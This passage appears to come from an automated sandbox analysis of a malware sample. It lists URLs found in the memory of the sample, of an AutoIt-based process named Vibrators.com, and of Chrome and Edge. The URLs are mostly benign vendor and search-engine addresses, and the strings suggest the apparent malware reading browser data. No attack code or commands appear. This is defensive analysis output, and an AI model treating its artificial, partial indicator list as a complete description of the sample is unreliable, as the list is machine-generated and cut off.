chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: Cellular.0.dr, Vibrators.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Cellular.0.dr, Vibrators.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Vibrators.com, 0000000B.00000000.1420068916.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp, Wife.0.dr, Vibrators.com.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: QIo3SytSZA.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, CBASRI.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 0000000F.00000003.1938569998.000016CC002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msedge.exe, 00000015.00000002.2056458629.00000190C618E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: msedge.exe, 00000019.00000002.2203789300.000002607EF8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml1
Source: 29481496-9506-4c27-b353-1dab07047e34.tmp.28.dr	String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.27.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.27.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, CBASRI.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: offscreendocument_main.js.27.dr, service_worker_bin_prod.js.27.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000000F.00000003.1914593476.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2060166432.00007B600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2207568613.000010400016C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: manifest.json0.27.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: chrome.exe, 0000000F.00000003.1926929593.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1916523052.000016CC00494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1916356271.000016CC00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1926878944.000016CC00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1932103535.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1914593476.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: msedge.exe, 00000015.00000002.2060166432.00007B600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2207568613.000010400016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.27.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 29481496-9506-4c27-b353-1dab07047e34.tmp.28.dr	String found in binary or memory: https://clients2.google.com
Source: chrome.exe, 0000000F.00000003.1891380199.000050FC002E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1891360400.000050FC002DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000F.00000003.1909975602.000016CC004C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2059067648.00007B6000040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2204247741.0000104000040000.00000004.00000800.00020000.00000000.sdmp, manifest.json.27.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 29481496-9506-4c27-b353-1dab07047e34.tmp.28.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 0000000F.00000003.1927203972.000016CC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/368855.)
Source: 2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json.27.dr	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000000F.00000003.1956879536.000016CC01788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956993954.000016CC0179C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: manifest.json.27.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.27.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: manifest.json.27.dr	String found in binary or memory: https://drive.google.com/
Source: Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log0.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log0.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
